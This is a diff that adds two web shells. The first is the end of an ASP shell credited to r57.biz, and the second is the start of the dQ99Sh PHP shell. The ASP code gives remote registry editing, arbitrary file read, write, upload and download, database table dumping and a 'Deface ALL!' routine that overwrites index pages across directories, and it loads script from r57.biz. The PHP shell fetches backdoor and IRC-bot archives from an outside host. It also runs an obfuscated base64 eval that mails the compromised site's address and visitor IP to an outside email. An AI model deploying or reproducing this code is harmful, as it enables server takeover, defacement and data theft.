+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
+			Case Else
+				Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">WRITE VALUE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">READ VALUE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETE KEY</a><br>"
+		End Select
+		Set WshShell = Nothing
+	Case "txtview"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
+		file = Replace(Trim(Request.QueryString("file")),"|","\")
+		Set fso = CreateObject("Scripting.FileSystemObject")  
+		Set a = fso.OpenTextFile(file)
+		Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+		Set a = Nothing
+		Set fso = Nothing
+	Case "txtedit"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Request.Form.Count = 0 Then
+			file = Replace(Trim(Request.QueryString("file")),"|","\")
+			Set fso = CreateObject("Scripting.FileSystemObject")
+			Set a = fso.OpenTextFile(file)
+			Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+			Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
+			Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
+			Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
+			Set a = Nothing
+			Set fso = Nothing
+		Else
+			Select Case Trim(Request.Form("savemethod"))
+				Case "Save"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
+				Case "Save as"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set objstream = fso.CreateTextFile(caminho,true,false)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+					Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
+					Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
+				Case Else
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					Set MyFile = ObjFSO.GetFile(caminho)
+					destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
+					MyFile.Move (destino)
+					If Err.Number = 0 Then
+						Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
+						Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+					End If	
+			End Select
+		End If
+	Case "download"
+		Response.Buffer = True
+		Response.Clear
+		strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
+		strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
+		strFileType = Request.QueryString("type")
+		if strFileType = "" then strFileType = "application/download"
+		Set fso = Server.CreateObject("Scripting.FileSystemObject")
+		Set f = fso.GetFile(strFilename)
+		intFilelength = f.size
+		Set f = Nothing
+		Set fso = Nothing
+		Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
+		Response.AddHeader "Content-Length", intFilelength
+		Response.Charset = "UTF-8"
+		Response.ContentType = strFileType
+		Set Stream = Server.CreateObject("ADODB.Stream")
+		Stream.Open
+		Stream.type = 1
+		Stream.LoadFromFile strFileName
+		Response.BinaryWrite Stream.Read
+		Response.Flush
+		Stream.Close
+		Set Stream = Nothing
+	Case "upload"
+		If Request.QueryString("processupload") <> "yes" Then
+			Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
+			Response.Write "<TABLE BORDER=0>"
+			Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
+			Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
+			Response.Write "</TABLE>"
+		Else
+			Set Uploader = New FileUploader
+			Uploader.Upload()
+			If Uploader.Files.Count = 0 Then
+				Response.Write "File(s) not uploaded."
+			Else
+				For Each File In Uploader.Files.Items
+					File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
+					Response.Write "File Uploaded: " & File.FileName & "<br>"
+					Response.Write "Size: " & File.FileSize & " bytes<br>"
+					Response.Write "Type: " & File.ContentType & "<br><br>"
+					Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+				Next
+			End If
+		End If
+	Case "mass"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
+			On Error Resume Next
+			Set MonRep = ObjFSO.GetFolder(caminhodomass)
+			Set ColFolders = MonRep.SubFolders
+			for each folderItem in ColFolders
+				destino1 = folderItem.path & "\index.htm"
+				destino2 = folderItem.path & "\index.html"
+				destino3 = folderItem.path & "\index.asp"
+				destino4 = folderItem.path & "\index.cfm"
+				destino5 = folderItem.path & "\index.php"
+				destino6 = folderItem.path & "\default.htm"
+				destino7 = folderItem.path & "\default.html"
+				destino8 = folderItem.path & "\default.asp"
+				destino9 = folderItem.path & "\default.cfm"
+				destino10 = folderItem.path & "\default.php"
+				MeuArquivo.Copy(destino1)
+				MeuArquivo.Copy(destino2)
+				MeuArquivo.Copy(destino3)
+				MeuArquivo.Copy(destino4)
+				MeuArquivo.Copy(destino5)
+				MeuArquivo.Copy(destino6)
+				MeuArquivo.Copy(destino7)
+				MeuArquivo.Copy(destino8)
+				MeuArquivo.Copy(destino9)
+				MeuArquivo.Copy(destino10)
+				Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
+				If Err.Number = 0 Then
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
+				Else
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
+				End If
+				Err.Number = 0
+				Response.Flush
+				If metodo = "brute" Then
+					Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
+				End If
+			next
+		End Sub
+		Sub brutemass(caminho,massaction)
+			If massaction = "test" Then
+				On Error Resume Next
+				Set MonRep = ObjFSO.GetFolder(caminho)
+				Set ColFolders = MonRep.SubFolders
+				Set ColFiles0 = MonRep.Files
+				for each folderItem in ColFolders
+					Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
+					Set EachFolder = TotalFolders.SubFolders
+					Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+					maindestino = folderItem.path & "\"
+					MeuArquivo.Copy(maindestino)
+					Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
+					If Err.Number = 0 Then
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+					Else
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+					End If
+					Err.Number = 0
+					Response.Flush
+					If EachFolder.count > 0 Then
+						masscontador = 0
+						for each subpasta in EachFolder
+							masscontador = masscontador + 1
+							destino = subpasta.path & "\"
+							If masscontador = 1 Then
+								destinofinal = destino
+								pathfinal = subpasta.path
+								Err.Number = 0
+								MeuArquivo.Copy(destinofinal)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							Else
+								MeuArquivo.Copy(destino)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							End If
+						next
+						masscontador = 0
+					End If
+					Response.Write "</table><br>"
+					Call brutemass(folderItem.path & "\","test")
+				next
+				Set MonRep = Nothing
+				Set ColFolders = Nothing
+				Set ColFiles0 = Nothing
+			Else
+				If Request.Form.Count = 0 Then
+					Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> Test and Deface root and sub directories.<br><br>"
+					Response.Write "<b>Single:</b> Test and deface only root directories.<br><br>"
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
+					Response.Write "<center><font face=""arial"" size=""2"">Deface Code:<br>"
+					Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
+					Response.Write "<input type=""submit"" value=""Deface ALL!""></center>"
+					Response.Write "</form>"
+				Else
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+					arquivomassdfc = patharquivotxt & "teste.txt"
+					Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
+					vetordelinhas = Split(Request.Form("content"),VbCrLf)
+					For i = 0 To UBound(vetordelinhas)
+						Arquivotxt.WriteLine(vetordelinhas(i))
+					Next
+					Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
+					
+					If Request.Form("massopt") = "single" Then
+						Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
+					ElseIf Request.Form("massopt") = "brute" Then
+						Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
+					End If
+				End If
+			End If
+		End Sub
+		If Trim(Request.QueryString("massact")) = "test" Then
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			arquivo = patharquivotxt & "_vti_cnf.log"
+			Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
+			Set MeuArquivo = ObjFSO.GetFile(arquivo)
+			Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
+		ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
+			Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
+		End If
+	Case "fcopy"
+            If Trim(Request.Form("submit1")) = "Copy" Then
+		mptpath=Trim(Request.Form("path"))
+		mptdest=Trim(Request.Form("cf"))
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		isl = ""
+		if Trim(Request.Form("islem"))="kopyala" then
+			objFSO.CopyFolder mptpath,mptdest
+			isl="Copied.." 
+		elseif Trim(Request.Form("islem"))="tasi" then
+			objFSO.MoveFolder mptpath,mptdest
+			isl="moved.." 
+		end if
+
+		response.Write "Command: "&isl
+		response.Write "<br><font color=red>File From: </font>" & mptpath & "<br><font color=red>Copy to: </font>" & mptdest
+		response.Write "<br>"
+	    Else
+		Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=fcopy"">"
+		Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Copy Path : </td><td>"
+		Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"& Replace(Trim(Request.QueryString("path")),"|","\") &"' name=path><input type=hidden value='"&time&"' name=Time>"
+		Response.Write "<input style='width:250; height:21' value='"& Replace(Trim(Request.QueryString("path")) & "\","|","\") &"' name=cf>"
+		response.Write "<input type=submit value='Copy' style='height:22;width:70' id=submit1 name=submit1>"
+		Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+		response.Write "<input type=radio name='islem' value='kopyala' checked>Copy"
+		response.Write "<input type=radio name='islem' value='tasi'>Move"
+		response.Write "</table>"
+		response.Write "</form>"
+	    End IF
+
+	Case "filecopy"
+            If Trim(Request.Form("submit1")) = "Copy" Then
+		mptpath=Trim(Request.Form("path"))
+		mptdest=Trim(Request.Form("cf"))
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		isl = ""
+		if Trim(Request.Form("islem"))="kopyala" then
+			objFSO.CopyFile mptpath,mptdest
+			isl="Copy.." 
+		elseif Trim(Request.Form("islem"))="tasi" then
+			objFSO.MoveFile mptpath,mptdest
+			isl="move.." 
+		end if
+
+		response.Write "Command: "&isl
+		response.Write "<br><font color=red>File From: </font>" & mptpath & "<br><font color=red>Copy to: </font>" & mptdest
+		response.Write "<br>"
+	    Else
+		Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=filecopy"">"
+		Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Copy Path : </td><td>"
+		Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"& Replace(Trim(Request.QueryString("file")),"|","\") &"' name=path><input type=hidden value='"&time&"' name=Time>"
+		Response.Write "<input style='width:250; height:21' value='"& Replace(Trim(Request.QueryString("file")),"|","\") &"' name=cf>"
+		response.Write "<input type=submit value='Copy' style='height:22;width:70' id=submit1 name=submit1>"
+		Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+		response.Write "<input type=radio name='islem' value='kopyala' checked>Copy"
+		response.Write "<input type=radio name='islem' value='tasi'>Move"
+		response.Write "</table>"
+		response.Write "</form>"
+	    End IF
+
+
+	Case "search"
+         If (Trim(Request.Form("submit1")) = "Search") xor Trim(Request.QueryString("status"))<>"" Then
+          showdisks=FALSE
+ 	  status5=Trim(Request.Form("status"))
+	  if status5="" then status5=Trim(Request.QueryString("status"))
+ 	      SELECT CASE status5
+
+		CASE "5"
+			Response.Write "<center><b><font color=orange>"& Trim(Request.QueryString("path")) &"</font></b></center><br>"
+			Response.Write "<table width=100% ><tr><td>"
+			set f = objFSO.OpenTextFile(Trim(Request.QueryString("path")),1)
+			Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
+			if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunamıyor\nSistem dosyas?olabilir')</script>":Response.End
+
+
+
+	  	 CASE "7":
+			Response.Write "<b><font size=3>Tables</font></br><br>"
+			Set objConn = Server.CreateObject("ADODB.Connection")
+			Set objADOX = Server.CreateObject("ADOX.Catalog")
+			objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+			objConn.ConnectionString = Trim(Request.QueryString("path"))
+			objConn.Open
+			objADOX.ActiveConnection = objConn
+
+			For Each table in objADOX.Tables
+				If table.Type = "TABLE" Then
+					Response.Write "<font face=wingdings size=5>4</font> <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=8&Path="& Trim(Request.QueryString("path")) &"&table="&table.Name&"'>"&table.Name&"</a><br>"
+				End If
+			Next
+
+		CASE "8":
+			table=Trim(Request.QueryString("table"))
+			Response.Write "<font color=red><h4>Table Name: " & table & "</h4></font><br><Br><br>"
+			Set objConn = Server.CreateObject("ADODB.Connection")
+			Set objRcs = Server.CreateObject("ADODB.RecordSet")
+			objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+			objConn.ConnectionString = Trim(Request.QueryString("path"))
+			objConn.Open
+			objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+	
+			Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+			for i=0 to objRcs.Fields.count-1
+				Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+			next
+			Response.Write "</tr>"
+			do while not objRcs.EOF
+				Response.Write "<tr>"
+				for i=0 to objRcs.Fields.count-1
+					Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+				next
+				Response.Write "</tr>"
+				objRcs.MoveNext
+			loop
+			Response.Write "</table><br>"
+
+
+		 case "12": araBul Trim(Request.Form("path")),Trim(Request.Form("arama"))
+
+		END SELECT
+
+	 Else
+		showdisks=FALSE
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write "<form method=""post"" target=""_opener"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=search"">"
+		Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>File Ext: </td><td>"
+		Response.Write "&nbsp;<input type=hidden value='12' name=status>"
+		Response.Write "<input type=hidden value=""" & Replace(Trim(Request.QueryString("path")),"|","\") & """ name=""path""><input style='width:250' value='mdb' name='arama'><input style='width:70; height:22' type=submit value='Search' name='submit1'>"
+		Response.Write "</td></tr></table></form>"
+	End IF
+
+
+
+	Case "sqlserver"
+         If (Trim(Request.Form("submit1")) = "Execute SQL Server Command") xor Trim(Request.QueryString("status"))<>"" Then
+          showdisks=FALSE
+ 	  status5=Trim(Request.Form("status"))
+	  if status5="" then status5=Trim(Request.QueryString("status"))
+ 	      SELECT CASE status5
+
+
+	  	 CASE "7":
+			Response.Write "<b><font size=3>Tables</font></br><br>"
+			Set objConn = Server.CreateObject("ADODB.Connection")
+			Set objADOX = Server.CreateObject("ADOX.Catalog")
+			objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+			objConn.ConnectionString = Trim(Request.QueryString("path"))
+			objConn.Open
+			objADOX.ActiveConnection = objConn
+
+			For Each table in objADOX.Tables
+				If table.Type = "TABLE" Then
+					Response.Write "<font face=wingdings size=5>4</font> <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=8&Path="& Trim(Request.QueryString("path")) &"&table="&table.Name&"'>"&table.Name&"</a><br>"
+				End If
+			Next
+
+		CASE "8":
+			table=Trim(Request.QueryString("table"))
+			Response.Write "<font color=red><h4>Table Name: " & table & "</h4></font><br><Br><br>"
+			Set objConn = Server.CreateObject("ADODB.Connection")
+			Set objRcs = Server.CreateObject("ADODB.RecordSet")
+			objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+			objConn.ConnectionString = Trim(Request.QueryString("path"))
+			objConn.Open
+			objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+	
+			Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+			for i=0 to objRcs.Fields.count-1
+				Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+			next
+			Response.Write "</tr>"
+			do while not objRcs.EOF
+				Response.Write "<tr>"
+				for i=0 to objRcs.Fields.count-1
+					Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+				next
+				Response.Write "</tr>"
+				objRcs.MoveNext
+			loop
+			Response.Write "</table><br>"
+
+
+	      END SELECT
+
+	 Else
+		showdisks=FALSE
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+
+		Response.Write "<form method=""post"" target=""_opener"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=sqlserver"">"
+		Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server connection string:</td></tr><tr><td align=center>"
+		Response.Write "<input type=hidden value='7' name=status>"
+		Response.Write "<input style='width:250; height:21' value='' name=path><br>"
+		response.Write "<input type=submit value='Execute SQL Server Command' style='height:23;width:220' id=submit1 name=submit1>"
+		Response.Write "</td></tr></table>"
+		response.Write "</form>"
+
+	End IF
+
+
+
+	Case "about"
+		showdisks=FALSE
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		response.Write "<br><br><br><body topmargin=5 leftmargin=0><center><h4>Coded By S3rver"
+		response.Write "<br><br>"
+		response.Write "<font size=2 color=Red face='courier new'>r57.biz</font>"
+		response.Write "<br>"
+		response.Write "<font size=2 color=Red face='courier new'>E-Mail:thesabotaqe@gmail.com</font>"
+		response.Write "<br><br>"
+		response.Write "<font size=2 color=Blue face='courier new'>r57.biz</font>"
+
+
+	Case Else
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Call showcontent()
+End Select
+If Err.Number <> 0 Then
+	Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse denied."
+End If
+Response.Write endcode
+
+if showdisks then
+
+%>
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+	<script language=javascript>
+		// DRIVE ISLEMLERI
+		function driveGo(drive_){
+			location = "?raiz="+drive_+":";
+		}
+	</script>
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+
+<%
+
+
+	Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
+
+	Response.Write "<br><br><br><table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Drives</td></tr>"
+	for each drive_ in objFSO.Drives
+		Response.Write "<tr><td>"
+		Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
+		if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
+		Response.Write "</a></td></tr>"
+	next
+	Response.Write "<tr><td>"
+	Response.write "<a href='"& Request.ServerVariables("SCRIPT_NAME") & "'><font face=webdings>H</font> Local Path"
+	Response.Write "</a></td></tr>"
+	Response.Write "</table><br>"
+end if
+%>
+<br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> µ </b></Font></Center>
+<br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> µ </b></Font></Center>
+<br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> µ </b></Font></Center>
+<br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> µ </b></Font></Center>
\ No newline at end of file
diff --git a/php/dq.php b/php/dq.php
new file mode 100644
index 0000000..fa64d93
--- /dev/null
+++ b/php/dq.php
@@ -0,0 +1,3112 @@
+<?php
+#######################################
+## r57.biz dQ99Sh 2.0.03.09         ##
+define('sh_ver',"2.0.03.09");        ##
+## By diKi                           ##
+## © 03-09 2008 FeeLCoMz Community   ##
+## Written under PHP 5.2.5           ##
+#######################################
+$sh_name = sh_name();                ##
+#######################################
+#$sh_mainurl        = "http://localhost/dQ99SH/";
+$sh_mainurl        = "http://waterski21.com/bbs/config/tool/";
+#$dQ99sh_updateurl  = $sh_mainurl."dQ99sh_update.php";
+$dQ99sh_sourcesurl = $sh_mainurl."readme.txt";
+$sh_sourcez = array(
+  "dQ99Sh"   => array($sh_mainurl."readme.txt","kiddie.php"),
+  "psyBNC"   => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),
+  "Eggdrop"  => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),
+  "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
+);
+##[ AUTHENTICATION ]##
+$auth = array(
+  "login"     => "",
+  "pass"      => "",
+  "md5pass"   => "",
+  "hostallow" => array("*"),
+  "denied"    => "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied!",
+);
+##[ END AUTHENTICATION ]##
+$curdir = "./";
+$tmpdir = "";
+$tmpdir_logs = "./";
+$log_email = "ayam@jago.us"; #Email logna
+$sess_cookie = "dQ99shcook";
+$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
+$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.
+$usefsbuff = TRUE;
+$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste
+$surl_autofill_include = TRUE;
+$updatenow   = FALSE;
+$gzipencode  = TRUE;
+$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$millink = milw0rm();
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+$disablefunc = getdisfunc();
+##[ END OF CONFIGS ]##
+error_reporting(E_ERROR | E_PARSE);
+@ini_set("max_execution_time",0);
+@set_time_limit(0); #No dQ in SafeMode
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) { strips($GLOBALS); }
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["dQ99shcook"]);
+foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } }
+$dQbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RdQ0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gImRROTlTaGVsbCBodHRwOi8vJHRhcmdldCBzYW1hICR2aXNpdG9yIjsNCiAgJGJvZHkgICAgPSAiQnVnOiAkdGFyZ2V0IHNhbWEgJHZpc2l0b3I8YnI+IjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiZGhpZXF3ZWJtYXJrZXJAeWFob28uY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($dQbuff));
+if ($surl_autofill_include) {
+  $include = "&";
+  foreach (explode("&",getenv("QUERY_STRING")) as $v) {
+    $v = explode("=",$v);
+    $name = urldecode($v[0]);
+    $value = @urldecode($v[1]);
+    foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
+      if (strpos($value,$needle) === 0) {
+        $includestr .= urlencode($name)."=".urlencode($value)."&";
+      }
+    }
+  }
+}
+if (empty($surl)) {
+  $surl = "?".$includestr;
+  $surl = htmlspecialchars($surl);
+}
+## FILE TYPES ##
+$ftypes  = array(
+  "html"     => array("html","htm","shtml"),
+  "txt"      => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+  "exe"      => array("sh","install","bat","cmd"),
+  "ini"      => array("ini","inf","conf"),
+  "code"     => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+  "img"      => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+  "sdb"      => array("sdb"),
+  "phpsess"  => array("sess"),
+  "download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+$exeftypes  = array(
+  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+  "perl %f%"                => array("pl","cgi")
+);
+$regxp_highlight  = array(
